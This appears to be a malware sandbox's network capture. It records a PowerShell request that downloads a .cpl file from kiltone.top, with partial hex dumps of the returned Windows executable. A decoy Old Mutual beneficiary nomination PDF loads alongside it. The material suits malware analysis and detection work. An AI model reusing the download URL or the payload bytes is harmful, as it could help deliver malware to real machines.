2024-12-19 06:52:29 UTC	16384	IN	Data Raw: 21 d7 44 2f ca 93 69 00 1f 68 f8 70 4f 78 fc be a9 0b 77 8e 7c 8c 6d 2f 8a f3 37 99 fd 14 77 9b 8b 38 8f 56 e1 4c d8 49 f3 f9 79 e3 16 e6 d6 44 b6 8c 6c 88 6b 86 21 ae 0c e7 e5 14 c1 17 d0 b7 f8 6a 2a c0 9d 26 8c af a2 3c fe 3c 68 c2 fd b5 8e 88 0f c1 b8 27 52 24 1f 47 43 f8 0c 94 af a4 6f e3 6c 1b 82 fa 85 48 8f c1 5a 4b a7 6b 64 63 f3 29 8c 3d 41 11 cc 8b b8 6a 0d 25 b1 06 c4 74 45 34 90 bd 09 6d 40 dc 70 04 fd 77 84 de 04 73 34 a5 60 3e a8 04 5e 50 a3 91 f5 b6 e9 67 b1 c0 09 32 41 01 88 03 b9 20 bb c3 7b fb e8 43 8f cf fa 6a e3 01 d5 a3 c7 7c 37 11 2f da c4 18 0a 16 cf 61 9c 3e 41 3a 8b 22 44 0c f4 69 e8 2b 94 24 46 a2 fe 74 8a 63 8f 19 cd 74 91 46 33 1b 98 65 9c 6d 4f 57 d3 32 e4 ef d0 69 1a 4d 1f 61 8f 99 04 3d 45 f9 8a d5 58 9b 67 c9 25 9f b1 03 88 Data Ascii: !D/ihpOxw\|m/7w8VLIyDlk!j*&<<h'R$GColHZKkdc)=Aj%tE4m@pws4`>^Pg2A {Cj\|7/a>A:"Di+$FtctF3emOW2iMa=EXg%
2024-12-19 06:52:29 UTC	16384	IN	Data Raw: 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31 30 36 37 20 30 20 6f 62 6a 0d 3c 3c 2f 42 42 6f 78 5b 30 2e 30 20 30 2e 30 20 32 38 2e 36 38 20 31 31 2e 36 34 5d 2f 46 6f 72 6d 54 79 70 65 20 31 2f 4c 65 6e 67 74 68 20 31 33 2f 4d 61 74 72 69 78 5b 31 2e 30 20 30 2e 30 20 30 2e 30 20 31 2e 30 20 30 2e 30 20 30 2e 30 5d 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 5d 3e 3e 2f 53 75 62 74 79 70 65 2f 46 6f 72 6d 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 3e 3e 73 74 72 65 61 6d 0d 0a 2f 54 78 20 42 4d 43 20 0a 45 4d 43 0a 0d 65 6e 64 73 74 72 65 61 6d Data Ascii: t[/PDF]>>/Subtype/Form/Type/XObject>>stream/Tx BMC EMCendstreamendobj1067 0 obj<</BBox[0.0 0.0 28.68 11.64]/FormType 1/Length 13/Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ProcSet[/PDF]>>/Subtype/Form/Type/XObject>>stream/Tx BMC EMCendstream

Timestamp	Bytes transferred	Direction	Data
2024-12-19 06:52:28 UTC	172	OUT	GET /stelin/rwcla.cpl HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: kiltone.top Connection: Keep-Alive
2024-12-19 06:52:29 UTC	253	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 19 Dec 2024 06:52:28 GMT Content-Type: application/octet-stream Content-Length: 211656 Last-Modified: Fri, 13 Dec 2024 23:55:16 GMT Connection: close ETag: "675cc964-33ac8" Accept-Ranges: bytes
2024-12-19 06:52:29 UTC	16131	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 71 8c 42 de 35 ed 2c 8d 35 ed 2c 8d 35 ed 2c 8d 46 8f 2f 8c 38 ed 2c 8d 46 8f 29 8c ac ed 2c 8d 46 8f 28 8c 23 ed 2c 8d 67 98 28 8c 3a ed 2c 8d 67 98 2f 8c 20 ed 2c 8d 67 98 29 8c 70 ed 2c 8d 46 8f 2d 8c 36 ed 2c 8d 35 ed 2d 8d 4a ed 2c 8d ff 98 25 8c 37 ed 2c 8d ff 98 d3 8d 34 ed 2c 8d ff 98 2e 8c 34 ed 2c 8d 52 69 63 68 35 ed 2c 8d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$qB5,5,5,F/8,F),F(#,g(:,g/ ,g)p,F-6,5-J,%7,4,.4,Rich5,
2024-12-19 06:52:29 UTC	16384	IN	Data Raw: 6a ff 68 1d 0d 02 10 64 a1 00 00 00 00 50 81 ec a0 00 00 00 a1 14 f0 02 10 33 c5 89 45 f0 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 75 08 8d 4d e4 6a 00 89 75 ec c7 45 e0 00 00 00 00 e8 12 0d 00 00 c7 45 fc 00 00 00 00 8b 3d fc 0c 03 10 a1 dc 0c 03 10 89 45 e0 85 ff 75 2f 57 8d 4d e8 e8 f0 0c 00 00 39 3d fc 0c 03 10 75 10 a1 c0 fe 02 10 40 a3 c0 fe 02 10 a3 fc 0c 03 10 8d 4d e8 e8 28 0d 00 00 8b 3d fc 0c 03 10 8b 4e 04 3b 79 0c 73 10 8b 41 08 8b 34 b8 85 f6 0f 85 5d 01 00 00 eb 02 33 f6 80 79 14 00 74 10 e8 17 10 00 00 3b 78 0c 73 0e 8b 40 08 8b 34 b8 85 f6 0f 85 3b 01 00 00 8b 45 e0 85 c0 74 07 8b f0 e9 2d 01 00 00 6a 18 e8 28 2f 00 00 8b f0 83 c4 04 89 75 e8 c6 45 fc 01 0f 57 c0 8b 4d ec 0f 11 06 66 0f d6 46 10 8b 49 04 85 c9 74 0c 8b 41 18 85 c0 75 0a 8d Data Ascii: jhdP3EVWPEduMjuEE=Eu/WM9=u@M(=N;ysA4]3yt;xs@4;Et-j(/uEWMfFItAu
2024-12-19 06:52:29 UTC	16384	IN	Data Raw: 00 10 89 4d f8 89 45 fc 64 a1 00 00 00 00 89 45 e8 8d 45 e8 64 a3 00 00 00 00 ff 75 18 51 ff 75 10 e8 c7 2c 00 00 8b c8 8b 45 e8 64 a3 00 00 00 00 8b c1 c9 c3 55 8b ec 83 ec 40 53 81 7d 08 23 01 00 00 75 12 b8 02 8c 00 10 8b 4d 0c 89 01 33 c0 40 e9 d1 00 00 00 83 65 c0 00 c7 45 c4 4e 8d 00 10 a1 14 f0 02 10 8d 4d c0 33 c1 89 45 c8 8b 45 18 89 45 cc 8b 45 0c 89 45 d0 8b 45 1c 89 45 d4 8b 45 20 89 45 d8 83 65 dc 00 83 65 e0 00 83 65 e4 00 89 65 dc 89 6d e0 64 a1 00 00 00 00 89 45 c0 8d 45 c0 64 a3 00 00 00 00 8b 45 08 ff 30 e8 7f 7b 01 00 59 8b 4d 08 89 01 c7 45 f8 01 00 00 00 8b 45 08 89 45 e8 8b 45 10 89 45 ec e8 bd 1d 00 00 8b 40 08 89 45 fc a1 38 11 02 10 89 45 f4 8b 4d fc ff 55 f4 8b 45 fc 89 45 f0 8d 45 e8 50 8b 45 08 ff 30 ff 55 f0 59 59 83 65 f8 00 Data Ascii: MEdEEduQu,EdU@S}#uM3@eENM3EEEEEEEE EeeeemdEEdE0{YMEEEEE@E8EMUEEEPE0UYYe
2024-12-19 06:52:29 UTC	16384	IN	Data Raw: 50 8d 45 f8 53 50 e8 af 5f 00 00 8b 46 20 83 c4 28 c1 e8 05 5b a8 01 74 13 83 7e 28 00 75 0d ff 76 08 ff 76 34 e8 7f f7 ff ff 59 59 8a 46 31 3c 67 74 04 3c 47 75 17 8b 46 20 c1 e8 05 a8 01 75 0d ff 76 08 ff 76 34 e8 d1 f6 ff ff 59 59 8b 46 34 80 38 2d 75 08 83 4e 20 40 40 89 46 34 8b 56 34 8a 02 3c 69 74 0c 3c 49 74 08 3c 6e 74 04 3c 4e 75 08 83 66 20 f7 c6 46 31 73 8d 7a 01 8a 0a 42 84 c9 75 f9 2b d7 b0 01 5f 89 56 38 5e 8b e5 5d c3 8b ff 56 8b f1 57 ff 76 2c 0f b6 46 31 50 ff 76 04 ff 36 e8 c5 f3 ff ff 83 c4 10 8d 7e 40 84 c0 74 39 83 46 14 04 8b 46 14 53 8b 9f 04 04 00 00 0f b7 40 fc 85 db 75 02 8b df 50 8b cf e8 04 f3 ff ff 50 8d 46 38 53 50 e8 0f 50 00 00 83 c4 10 5b 85 c0 74 25 c6 46 30 01 eb 1f 8b 8f 04 04 00 00 85 c9 75 02 8b cf 83 46 14 04 8b 46 Data Ascii: PESP_F ([t~(uvv4YYF1<gt<GuF uvv4YYF48-uN @@F4V4<it<It<nt<Nuf F1szBu+_V8^]VWv,F1Pv6~@t9FFS@uPPF8SPP[t%F0uFF
2024-12-19 06:52:29 UTC	16384	IN	Data Raw: 33 c0 5f 5b 5e 8b e5 5d c3 8b ff 55 8b ec 83 ec 1c a1 14 f0 02 10 33 c5 89 45 fc 8b c1 89 45 e8 57 8b 00 8b 38 85 ff 75 08 83 c8 ff e9 ed 00 00 00 53 8b 1d 14 f0 02 10 8b d3 56 8b 37 83 e2 1f 8b 7f 04 33 f3 8b ca 33 fb d3 ce d3 cf 85 f6 0f 84 c5 00 00 00 83 fe ff 0f 84 bc 00 00 00 6a 20 59 2b ca 89 75 f4 33 c0 89 7d f0 d3 c8 33 c3 89 45 ec 83 ef 04 3b fe 72 68 8b 0f 3b c8 74 f3 33 cb 89 07 89 4d f8 8b ca 8b 5d f8 d3 cb 8b cb ff 15 38 11 02 10 ff d3 8b 45 e8 8b 1d 14 f0 02 10 8b d3 83 e2 1f 8b 00 8b 00 8b 08 8b 40 04 33 cb 89 4d f8 33 c3 8b ca d3 4d f8 d3 c8 8b 4d f8 89 45 e4 3b 4d f4 75 0b 3b 45 f0 8b 45 ec 74 a3 8b 45 e4 89 45 f0 8b f8 8b 45 ec 8b f1 89 4d f4 eb 91 83 fe ff 74 0d 56 e8 13 0d 00 00 8b 1d 14 f0 02 10 59 8b c3 33 d2 83 e0 1f 6a 20 59 2b c8 Data Ascii: 3_[^]U3EEW8uSV733j Y+u3}3E;rh;t3M]8E@3M3MME;Mu;EEtEEEMtVY3j Y+
2024-12-19 06:52:29 UTC	16384	IN	Data Raw: 00 00 83 c4 10 c3 68 54 52 02 10 68 4c 52 02 10 68 54 52 02 10 6a 0f e8 34 01 00 00 83 c4 10 c3 68 9c 52 02 10 68 94 52 02 10 68 9c 52 02 10 6a 13 e8 1a 01 00 00 83 c4 10 c3 68 d0 52 02 10 68 c8 52 02 10 68 d0 52 02 10 6a 15 e8 00 01 00 00 83 c4 10 c3 68 b8 52 02 10 68 b0 52 02 10 68 b8 52 02 10 6a 14 e8 e6 00 00 00 83 c4 10 c3 68 ec 52 02 10 68 e4 52 02 10 68 ec 52 02 10 6a 16 e8 cc 00 00 00 83 c4 10 c3 8b ff 55 8b ec 51 53 56 57 8b 7d 08 e9 a1 00 00 00 8b 1f 8d 04 9d e8 0a 03 10 8b 30 89 45 fc 85 f6 74 0b 83 fe ff 0f 84 83 00 00 00 eb 7d 8b 1c 9d 50 4c 02 10 68 00 08 00 00 6a 00 53 ff 15 a8 10 02 10 8b f0 85 f6 75 50 ff 15 04 10 02 10 83 f8 57 75 35 6a 07 68 50 51 02 10 53 e8 dc cc ff ff 83 c4 0c 85 c0 74 21 6a 07 68 60 51 02 10 53 e8 c8 cc ff ff 83 c4 Data Ascii: hTRhLRhTRj4hRhRhRjhRhRhRjhRhRhRjhRhRhRjUQSVW}0Et}PLhjSuPWu5jhPQSt!jh`QS
2024-12-19 06:52:29 UTC	16384	IN	Data Raw: 58 c5 66 0f 14 c0 66 0f 59 f0 f2 0f 59 e0 66 0f 59 c0 66 0f 58 fe 66 0f 59 f8 f2 0f 59 c3 66 0f 70 f7 ee f2 0f 59 c7 66 0f 70 eb ee f2 0f 59 f3 f2 0f 59 e3 66 0f 6e f9 66 0f 73 f7 2d 66 0f 6e d2 66 0f 76 c9 66 0f f3 ca f2 0f 58 c5 f2 0f 58 c6 66 0f 54 cb f2 0f 58 c4 66 0f 57 f6 66 0f 76 e4 66 0f f3 e2 f2 0f 5c d9 f2 0f 10 d1 f2 0f 58 c8 66 0f 54 cc 66 0f c4 f7 03 5f f2 0f 5c d1 f2 0f 58 c2 f2 0f 58 c3 83 fe 00 7f 4e 5e f2 0f 59 c7 f2 0f 59 cf f2 0f 58 c1 f2 0f 59 f0 f2 0f 58 c6 66 0f c5 c0 03 25 f0 7f 00 00 ba 18 00 00 00 3d f0 7f 00 00 0f 84 10 fe ff ff ba 19 00 00 00 83 f8 00 0f 84 02 fe ff ff 83 ec 10 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 5e f2 0f 58 c1 f2 0f 59 c7 f2 0f 59 f0 f2 0f 58 c6 66 0f c5 c0 03 25 f0 7f 00 00 ba 18 00 00 00 3d f0 7f 00 00 Data Ascii: XffYYfYfXfYYfpYfpYYfnfs-fnfvfXXfTXfWfvf\XfTf_\XXN^YYXYXf%=fD$D$^XYYXf%=
2024-12-19 06:52:29 UTC	16384	IN	Data Raw: 00 57 8d 45 ec 6a 02 50 e8 89 8e ff ff 83 c4 3c 0b c3 f7 d8 1a c0 5f 5e fe c0 5b 8b e5 5d c3 8b ff 55 8b ec 56 8b 75 08 85 f6 0f 84 d0 00 00 00 6a 07 56 e8 31 fd ff ff 8d 46 1c 6a 07 50 e8 26 fd ff ff 8d 46 38 6a 0c 50 e8 1b fd ff ff 8d 46 68 6a 0c 50 e8 10 fd ff ff 8d 86 98 00 00 00 6a 02 50 e8 02 fd ff ff ff b6 a0 00 00 00 e8 8d 4d ff ff ff b6 a4 00 00 00 e8 82 4d ff ff ff b6 a8 00 00 00 e8 77 4d ff ff 8d 86 b4 00 00 00 6a 07 50 e8 d3 fc ff ff 8d 86 d0 00 00 00 6a 07 50 e8 c5 fc ff ff 83 c4 44 8d 86 ec 00 00 00 6a 0c 50 e8 b4 fc ff ff 8d 86 1c 01 00 00 6a 0c 50 e8 a6 fc ff ff 8d 86 4c 01 00 00 6a 02 50 e8 98 fc ff ff ff b6 54 01 00 00 e8 23 4d ff ff ff b6 58 01 00 00 e8 18 4d ff ff ff b6 5c 01 00 00 e8 0d 4d ff ff ff b6 60 01 00 00 e8 02 4d ff ff 83 c4 Data Ascii: WEjP<_^[]UVujV1FjP&F8jPFhjPjPMMwMjPjPDjPjPLjPT#MXM\M`M
2024-12-19 06:52:29 UTC	16384	IN	Data Raw: e9 48 11 fe ff 8d 4d bc e9 b0 1e fe ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a 98 33 c8 e8 9a 6f fe ff 8b 4a fc 33 c8 e8 90 6f fe ff b8 c4 da 02 10 e9 af 82 fe ff cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a fc 33 c8 e8 6f 6f fe ff b8 00 d8 02 10 e9 8e 82 fe ff cc cc cc 8d 4d e8 e9 68 27 fe ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a e4 33 c8 e8 42 6f fe ff 8b 4a fc 33 c8 e8 38 6f fe ff b8 08 db 02 10 e9 57 82 fe ff cc cc cc cc cc cc cc cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a ec 33 c8 e8 0f 6f fe ff b8 44 db 02 10 e9 2e 82 fe ff cc cc cc 8d 4d e0 e9 e6 4c fe ff 6a 18 8b 45 dc 50 e8 fd 6e fe ff 83 c4 08 c3 8d 4d e8 e9 31 46 fe ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a 90 33 c8 e8 cb 6e fe ff 8b 4a f8 33 c8 e8 c1 6e fe ff b8 Data Ascii: HMT$BJ3oJ3oT$BJ3ooMh'T$BJ3BoJ38oWT$BJ3oD.MLjEPnM1FT$BJ3nJ3n
2024-12-19 06:52:29 UTC	16384	IN	Data Raw: 00 d0 4b 02 10 19 00 00 00 d8 4b 02 10 11 00 00 00 e0 4b 02 10 18 00 00 00 e8 4b 02 10 16 00 00 00 f0 4b 02 10 17 00 00 00 f8 4b 02 10 22 00 00 00 00 4c 02 10 23 00 00 00 04 4c 02 10 24 00 00 00 08 4c 02 10 25 00 00 00 0c 4c 02 10 26 00 00 00 14 4c 02 10 65 78 70 00 70 6f 77 00 6c 6f 67 00 6c 6f 67 31 30 00 00 00 73 69 6e 68 00 00 00 00 63 6f 73 68 00 00 00 00 74 61 6e 68 00 00 00 00 61 73 69 6e 00 00 00 00 61 63 6f 73 00 00 00 00 61 74 61 6e 00 00 00 00 61 74 61 6e 32 00 00 00 73 71 72 74 00 00 00 00 73 69 6e 00 63 6f 73 00 74 61 6e 00 63 65 69 6c 00 00 00 00 66 6c 6f 6f 72 00 00 00 66 61 62 73 00 00 00 00 6d 6f 64 66 00 00 00 00 6c 64 65 78 70 00 00 00 5f 63 61 62 73 00 00 00 5f 68 79 70 6f 74 00 00 66 6d 6f 64 00 00 00 00 66 72 65 78 70 00 00 00 5f 79 Data Ascii: KKKKKK"L#L$L%L&Lexppowloglog10sinhcoshtanhasinacosatanatan2sqrtsincostanceilfloorfabsmodfldexp_cabs_hypotfmodfrexp_y

Timestamp	Bytes transferred	Direction	Data
2024-12-19 06:52:29 UTC	710	OUT	GET /favicon.ico HTTP/1.1 Host: www.oldmutual.co.za Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-19 06:52:30 UTC	9606	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 8659 Connection: close Date: Thu, 19 Dec 2024 05:18:11 GMT Last-Modified: Wed, 18 Dec 2024 15:03:19 GMT x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Server: AmazonS3 Content-Security-Policy: default-src 'self'; font-src 'self' data: https://use.typekit.net https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://tagmanager.google.com https://fonts.googleapis.com https://fonts.gstatic.com https://www.brighttalk.com https://www.pages06.net https://vds.issproxy.com https://vds.issgovernance.com https://ir.tools.investis.com https://otp.tools.investis.com https://irs.tools.investis.com https://services.ominsure.co.za https://embed.tawk.to https://salesiq.zoho.com https://css.zohostatic.com https://css.zohocdn.com/* https://css.zohocdn.com/salesiq/styles/fonts/cw/puvi/* https://css.zohocdn.com/salesiq/styles/fonts/cw/* https://css.zohocdn.com; style-src 'self' 'unsafe-inline' https://tagmanager.google.com https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://fonts.googleapis.com https://optimize.google [TRUNCATED]
2024-12-19 06:52:31 UTC	9823	IN	Data Raw: 58 2d 57 65 62 4b 69 74 2d 43 53 50 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 66 6f 6e 74 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 20 68 74 74 70 73 3a 2f 2f 74 65 73 74 2d 64 6d 73 2e 6f 6c 64 6d 75 74 75 61 6c 2e 63 6f 6d 2e 67 68 20 68 74 74 70 73 3a 2f 2f 74 65 73 74 2e 69 6e 74 65 72 70 61 79 61 66 72 69 63 61 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 74 65 73 74 2d 64 6d 73 2e 6f 6c 64 6d 75 74 75 61 6c 2e 63 6f 6d 2e 67 68 2f 2a 20 68 74 74 70 73 3a 2f 2f 74 65 73 74 2e 69 6e 74 65 72 70 61 79 61 66 72 69 63 61 2e 63 6f 6d 2f 2a 20 20 68 74 74 70 73 3a 2f 2f 74 61 67 6d 61 6e 61 67 65 72 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f Data Ascii: X-WebKit-CSP: default-src 'self'; font-src 'self' data: https://use.typekit.net https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://tagmanager.google.com https://
2024-12-19 06:52:31 UTC	8659	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 68 74 6d 6c 2d 73 65 72 76 65 72 2d 72 65 6e 64 65 72 65 64 3d 22 74 72 75 65 22 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 76 75 65 2d 74 61 67 3d 22 25 37 42 25 32 32 6c 61 6e 67 25 32 32 3a 25 37 42 25 32 32 73 73 72 25 32 32 3a 25 32 32 65 6e 25 32 32 25 37 44 25 37 44 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 72 69 64 73 6f 6d 65 3a 68 61 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 35 63 38 39 66 39 36 37 66 63 38 65 38 62 64 31 32 30 36 64 31 33 64 39 32 31 31 66 64 35 35 37 35 38 62 35 63 36 64 22 3e 3c 6d 65 74 61 20 64 61 74 61 2d 76 75 65 2d 74 61 67 3d 22 73 73 72 22 20 Data Ascii: <!DOCTYPE html><html data-html-server-rendered="true" lang="en" data-vue-tag="%7B%22lang%22:%7B%22ssr%22:%22en%22%7D%7D"> <head> <title> </title><meta name="gridsome:hash" content="55c89f967fc8e8bd1206d13d9211fd55758b5c6d"><meta data-vue-tag="ssr"

Timestamp	Bytes transferred	Direction	Data
2024-12-19 06:52:33 UTC	450	OUT	GET /v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf HTTP/1.1 Host: www.oldmutual.co.za Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-19 06:52:33 UTC	1055	IN	HTTP/1.1 200 OK Content-Type: application/pdf Content-Length: 313058 Connection: close Content-Disposition: inline; filename=Superfund_Beneficiary_Nomination_form.pdf Fastly-Io-Error: not a supported image format Fastly-Io-Served-By: vpop-etou8240196 Fastly-Stats: io=1 Server: contentstack X-Contentstack-Organization: blt2c31cdce6d24f06c X-Request-Id: 3dd79f5f402ab71f92243ac6017a1eed X-Runtime: 97ms Via: 1.1 varnish, 1.1 varnish, 1.1 f86af2517be02da2188623ca97ab57f0.cloudfront.net (CloudFront) Cache-Control: max-age=31536000 Accept-Ranges: bytes Date: Thu, 19 Dec 2024 06:52:28 GMT X-Served-By: cache-ams21052-AMS, cache-fjr990025-FJR X-Cache-Hits: 4, 0 X-Timer: S1734591149.900478,VS0,VE1 Access-Control-Expose-Headers: content-disposition, content-type, cache-control, status, content-length Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=31557600 Vary: Accept-Encoding X-Cache: Hit from cloudfront X-Amz-Cf-Pop: DXB52-P1 X-Amz-Cf-Id: TSzJykJUzmV5n-VQKtRFYT8W3FFVNI_OIjSwG8Ro3RX5W4-ji8Fz3Q== Age: 5
2024-12-19 06:52:33 UTC	16384	IN	Data Raw: 25 50 44 46 2d 31 2e 36 0d 25 e2 e3 cf d3 0d 0a 31 31 39 36 20 30 20 6f 62 6a 0d 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 46 69 72 73 74 20 34 31 38 2f 4c 65 6e 67 74 68 20 33 36 38 31 2f 4e 20 34 36 2f 54 79 70 65 2f 4f 62 6a 53 74 6d 3e 3e 73 74 72 65 61 6d 0d 0a 68 de cc 5a 7b 6f 1b 39 92 ff 2a 0d dc 1f 9b e0 30 62 37 9f 4d 60 11 40 b1 9d 19 df c6 76 2e 76 2e 37 d3 10 16 6d a9 6d 37 46 52 6b 5b ad 4c 7c 9f fe 7e 45 16 65 f9 19 27 13 4c 16 86 c4 57 55 b1 aa 58 2f d2 f2 b6 cc f2 cc 5b 9f 49 6d 32 6f 5c e6 a4 45 6b b3 52 62 de 60 ae c0 d8 a9 ac c8 1d 06 ae c8 0a 53 52 47 66 32 2f a8 93 67 52 5a 09 1a 98 31 04 6c 8b 4c 5a 55 a2 e3 d0 d1 0e 1d 9b 49 e7 08 46 a1 53 16 e8 00 ab 54 0a 3b f8 4c e9 02 33 a6 cc 94 75 c4 8b c9 94 93 00 76 Data Ascii: %PDF-1.6%1196 0 obj<</Filter/FlateDecode/First 418/Length 3681/N 46/Type/ObjStm>>streamhZ{o9*0b7M`@v.v.7mm7FRk[L\|~Ee'LWUX/[Im2o\EkRb`SRGf2/gRZ1lLZUIFST;L3uv
2024-12-19 06:52:33 UTC	16384	IN	Data Raw: 27 06 fe bc d0 63 0f 61 5d 5e 56 70 d7 b5 de 4e bb 2e 2f 2b 56 fb 86 cb cb 8a ed 9d b3 2e 2f 2b b6 17 ae ba bc ac d8 5e b8 ea d2 b2 62 fb 6d e4 fe 1a 71 50 56 cc 5f 10 7c 5a 56 22 e6 95 f3 0d 15 71 55 7c 14 d4 ba c2 0b e2 69 59 59 27 5e f3 01 7e 1a 4d 63 d7 38 34 ba c6 d0 38 35 a6 c6 d2 28 3c 13 9e 09 cf 84 67 0f 75 22 46 7c a1 6c 55 3f 6d ac 6e 1a bb c6 a1 d1 35 86 c6 a9 31 35 d6 43 09 59 4f 0b 11 9e 1b 75 9f cd cf 16 6f 4b ba 97 74 2f e9 5e d2 bd 4c 2a 98 54 30 a9 60 52 c1 f2 fc d1 b7 25 0f 97 3c 5c f2 70 c9 c3 25 0f 97 3c 5c f2 70 c9 c3 d5 0e 0c bb cd 25 3f 2f f9 79 29 6e 4b 71 5b 8a db 52 dc 96 e2 b6 14 b7 b5 8e d0 55 e5 b3 84 aa de 92 ea 2d a9 de 92 ea 2d a9 de 92 a5 6c 38 15 91 73 e8 ea 0a a9 ae 90 ea 0a a9 ae 90 29 54 f5 a2 54 2f 4a f5 a2 2c 3b 42 Data Ascii: 'ca]^VpN./+V./+^bmqPV_\|ZV"qU\|iYY'^~Mc8485(<gu"F\|lU?mn515CYOuoKt/^L*T0`R%<\p%<\p%?/y)nKq[RU--l8s)TT/J,;B
2024-12-19 06:52:34 UTC	16384	IN	Data Raw: 64 3a 33 35 38 33 63 35 35 31 2d 36 38 30 37 2d 39 37 34 31 2d 39 63 66 30 2d 36 38 32 64 62 35 31 38 31 35 33 65 3c 2f 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 69 6e 64 64 3a 63 33 36 35 33 35 39 65 2d 35 62 35 66 2d 31 31 64 64 2d 39 31 65 30 2d 62 30 65 61 30 30 65 31 37 65 62 64 3c 2f 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3e 78 6d 70 2e 69 64 3a 32 65 34 64 31 30 61 38 2d 38 31 34 31 2d 34 31 64 35 2d 38 35 38 37 2d 33 62 33 32 39 33 34 62 66 38 66 65 3c 2f 78 6d 70 4d 4d 3a 44 6f 63 Data Ascii: d:3583c551-6807-9741-9cf0-682db518153e</xmpMM:InstanceID> <xmpMM:OriginalDocumentID>adobe:docid:indd:c365359e-5b5f-11dd-91e0-b0ea00e17ebd</xmpMM:OriginalDocumentID> <xmpMM:DocumentID>xmp.id:2e4d10a8-8141-41d5-8587-3b32934bf8fe</xmpMM:Doc
